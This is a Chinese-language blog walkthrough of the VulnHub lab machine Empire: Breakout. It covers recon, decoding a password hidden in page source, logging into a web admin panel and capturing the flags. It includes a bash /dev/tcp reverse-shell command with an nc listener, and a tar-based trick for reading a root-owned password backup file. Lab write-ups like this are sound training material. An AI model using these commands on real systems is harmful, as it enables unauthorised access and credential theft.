Empire Breakout (vulnhub靶机之帝国系列靶机1)

已于 2024-08-13 00:15:45 修改
阅读量208 收藏 3
点赞数 10
文章标签: 网络安全 web安全
于 2024-08-13 00:14:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53193784/article/details/141145092
版权
环境搭建

下载地址:

#镜像地址
https://download.vulnhub.com/empire/02-Breakout.zip

#虚拟机下载地址
https://www.virtualbox.org/	(选择适合自己的版本下载)
PS:因为解压得到的.ova格式的虚拟镜像文件,所以使用virtualbox虚拟机比vmware虚拟机要要稳定,防止出现网络报错或者系统报错
信息收集
① 常规扫描

扫描靶机IP

arp-scan -l

在这里插入图片描述

扫描在同一网段上存活主机,可以发现我们的靶机,并确认它的mac地址

扫描开放端口

nmap -sV -A 10.0.2.13

在这里插入图片描述

可以看到开放了以上端口 80,139,445,10000,20000。先记录

访问80端口
在这里插入图片描述

显示Apache服务页面,右键查看源码(这种靶机一般都要查看一下页面源码,有时候会有想不到的惊喜)

在这里插入图片描述

在源码页面底下发现了一串密文,观察格式为Ook加密的密文。使用在线网址解密(https://www.cachesleuth.com/)得到密文

.2uqPEfj3D<P'a-3

扫描目录

dirsearch -u http://10.0.2.13

在这里插入图片描述

访问一下这个目录,发现知识Apache的默认配置目录,没有任何利用价值。

② 访问10000和20000端口

10000端口

在这里插入图片描述

20000端口

在这里插入图片描述

注意,网站搭建采用了ssl进行搭建,直接使用IP+端口访问不成功,需要在前面加上https协议前缀方能访问成功。

可以看出是两个登录框,暂时搁置,后续不行再进行爆破利用。

③ smb服务爆破
前面nmap扫描中扫描到了该服务器开放了smb服务,所以尝试对smb服务进行爆破尝试获取信息。

#使用工具 enum4linux

enum4linux -a 10.0.2.13

在这里插入图片描述

得到一个cyber用户。尝试与之前获取的密码进行拼接利用。

user : cyber

passwd : .2uqPEfj3D<P'a-3

对10000端口页面进行登录

在这里插入图片描述

失败

对20000端口页面进行登录

在这里插入图片描述

成功

左下角有一个终端功能,尝试利用。

在这里插入图片描述

④ 使用终端功能进行渗透
#命令
ls

cat user.txt

在这里插入图片描述

得到flag1

[cyber@breakout ~]$ cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

既然可以正常执行命令,那我们就进行一个反弹shell尝试

反弹shell

#分享一个好用的渗透工具合集网址
https://forum.ywhack.com/bountytips.php?

#命令
靶机终端
bash -i >& /dev/tcp/10.0.2.5/1234 0>&1

#攻击机
nc -lvp 1234

在这里插入图片描述

成功获取shell

⑤ 提权
ls -l		#查看当前目录下文件权限

在这里插入图片描述

可以看出tar文件的权限为root并且cyber用户可以执行,而tar是Linux系统的一个压缩软件。后续我们可以尝试进行利用,先记录下来。

查找备份文件,看看是否会有备份密码

cd var

ls -la

cd /backup

ls -la

在这里插入图片描述

/var是Linux系统的备份目录,/var/backup中一般存储系统的备份文件。

可以看到.old_pass.bak执行权限为root,怀疑里面存有root的密码。

由于我们此时为cyber用户,所以我们无法直接查看.old_pass.bak文件内容,但是前文我们已经知道我们可以使用tar程序,所以我们的思路是:

① 先使用/~目录下的tar程序压缩.old_pass.bak文件

② 再解压,此时我们解压的程序就可以通过cyber用户查看。

操作

1.回到/~目录
cd ~

2.压缩
./tar -czvf 1.tar /var/backups/.old_pass.bak

3.解压
tar -xf 1.tar

4.进入/var/backups目录查看权限
cd /var/backups

3.查看权限
ls -la

在这里插入图片描述

可以看到权限成功修改为普通用户也可以查看.

提权获取高权限flag

#查看.old_pass.bak内容
cat .old_pass.bak

#获得高权限用户密码
cyber@breakout:~/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h

在这里插入图片描述

登录高权限用户

① su root

② 输入我们在.old_pass.bak文件获取的密码

在这里插入图片描述

成功登录

访问/~目录,获取root的flag

cd ~

ls

cat root.txt

在这里插入图片描述

成功获取root权限用户的flag

至此,我们获取了全部的两个flag,分别为

cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

成功获取root权限用户的flag

MDream11
关注
  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机:Empire: Breakout
weixin_69670995的博客
05-13 843
发现它是可以读取任意的文件,但是不知道/root目录下有什么文件,到着没有思路了,查看网上资料在/var/ backups目录下面有一个.old_pass.bak文件,我们使用tar去查看一下这文件里的内容(先将.old_pass.bak文件进行压缩到家目录下,然后解压到家目录下,使用cat命令查看文件)试了很多次,发现不让输入密码,这就很无语,报"Authentication failure"错误,我知道的报这个错误的原因是密码输入错误或者是root没有设置密码,尝试一下反弹shell吧。
vulnhub靶机渗透 Empire Breakout
RestoreJustice的博客
03-18 166
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。​ 192.168.80.139 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24。10000和20000均是webmin系统的登录界面,口令爆破、目录探测无果。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.139。
Vulnhub靶机——EMPIRE BREAKOUT(1)
2401_84973175的博客
05-13 601
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Vulnhub靶机:empire breakout
qq_48904485的博客
01-08 894
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:empire:breakout(10.0.2.11)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
Vulnhub靶机——EMPIRE BREAKOUT
2401_84973202的博客
05-13 825
(1)信息收集(端口信息,源码泄露,服务扫描)(2)利用tar文件的特殊权限实现任意文件读取(3)su登录失败则执行反弹shell自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
Vulnhub靶机——EMPIRE BREAKOUT(2)
2401_84973188的博客
05-13 804
(1)信息收集(端口信息,源码泄露,服务扫描)(2)利用tar文件的特殊权限实现任意文件读取(3)su登录失败则执行反弹shell自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
靶机1 Empire:Breakout(帝国突围)
honest_gg的博客
09-09 1193
靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权
Vulnhub靶机——EMPIRE: BREAKOUT
流水不争先,争的是滔滔不绝
04-08 990
Vulnhub靶机——EMPIRE: BREAKOUT,tar文件具有可执行权,并且具备跨目录读取任意文件的特殊权限,利用tar文件的打包压缩再解压,实现文件的权限绕过
vulnhub EMPIRE: BREAKOUT靶机
小小猪的博客
08-30 698
/tar -cvf pass.tar /var/backups/.old_pass.bak (注:此处使用./tar 表示使用此目录的tar文件)开启了smb服务,enum4linux 192.168.226.129收集更多信息,web指纹页面收集也可以,收集到用户名。直接读取.old_pass.bak文件无法读取,但是我们可以用tar命令将其压缩在解压就可以顺利读取了。经过一番寻找之后,发现/var/backups下有个备份文件.old_pass.bak。再次查看,即可查看到root密码。...
帝国CMS网站管理系统(Empire CMS) v4.0 简体中文版
12-02
一、超强系统模型扩展功能 帝国CMS是不同于以往的CMS系统,他可以直接在后台通过新建表、自定义字段,然后组成新的系统模型。从而实现各种适合用户自己的系统。如下载系统、音乐系统、商城系统、产品库等等。。。...
帝国CMS网站管理系统(Empire CMS) v3.7 繁体版
12-02
版本功能列表: 一、开放功能模块(包括相应的采集) 1.新闻系统模型 2.下载系统模型 3.图库系统模型 二、系统模块功能 4.信息来源管理 5.作者管理 6.内容关键字管理 7.管理过滤字符 8.管理错误报告 三、栏目管理 9....
帝国CMS网站管理系统(Empire CMS) v3.7 简体版
12-02
版本功能列表: 一、开放功能模块(包括相应的采集) 1.新闻系统模型 2.下载系统模型 3.图库系统模型 二、系统模块功能 4.信息来源管理 5.作者管理 6.内容关键字管理 7.管理过滤字符 8.管理错误报告 三、栏目管理 9....
帝国CMS网站管理系统(Empire CMS) v4.7 繁体中文版
12-02
一、超强系统模型扩展功能 帝国CMS是不同于以往的CMS系统,他可以直接在后台通过新建表、自定义字段,然后组成新的系统模型。从而实现各种适合用户自己的系统。如下载系统、音乐系统、商城系统、产品库等等。。。...
empire-agent:帝国客户代理
05-22
帝国Agent(Empire Agent)是一种高级的、动态的命令与控制(C2)代理,它主要由Python语言编写。在网络安全领域,C2代理通常用于渗透测试和红队操作,模拟攻击者如何控制受感染的系统。Empire是这个领域的知名工具...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8384
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
科普课堂走起 | 什么是网络安全和数据安全?
最新发布
anqishenrjjian的博客
08-09 197
数据安全是指保护数据免遭意外或非法访问、更改、泄露或破坏的一系列策略和技术。它的目标是在整个数据生命周期中保护数据资产的价值和完整性。网络安全是指保护网络系统免受未经授权的访问、攻击、破坏或滥用的一系列技术和过程。网络安全更侧重于保护网络基础设施本身,而数据安全则侧重于保护存储在网络中的数据。希望这些信息对你有所帮助!在实际应用中,这两者往往是相辅相成的,共同构成了一个组织全面的安全框架。防火墙:监控并控制进出网络的流量,根据预定的安全规则过滤数据包。数据加密:将数据转换为只有授权用户才能解码的形式。
网络安全】玲珑安全第四期
等风来
08-08 252
鉴于玲珑安全漏洞挖掘前三期课程取得的优异成绩和获得的强烈反响,我们决定启动玲珑安全第四期漏洞挖掘培训计划。
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
m0_57291352的博客
08-09 1150
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能。在这个靶场中,你可以接触到加密方式和解密过程,对于第一次接触这种加密方式的人来说,可以使用在线站点来进行解密操作,提高对该加密方式的理解和熟悉度。 EMPIRE: BREAKOUT靶场是一个适合初学者的简单难度的靶场,对于计算机学习者来说,初期的学习往往是最迷茫和难以坚持的,但通过不断的学习和实践,经验和能力会得到提高。这个靶场可以帮助你探索和学习网络安全方面的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值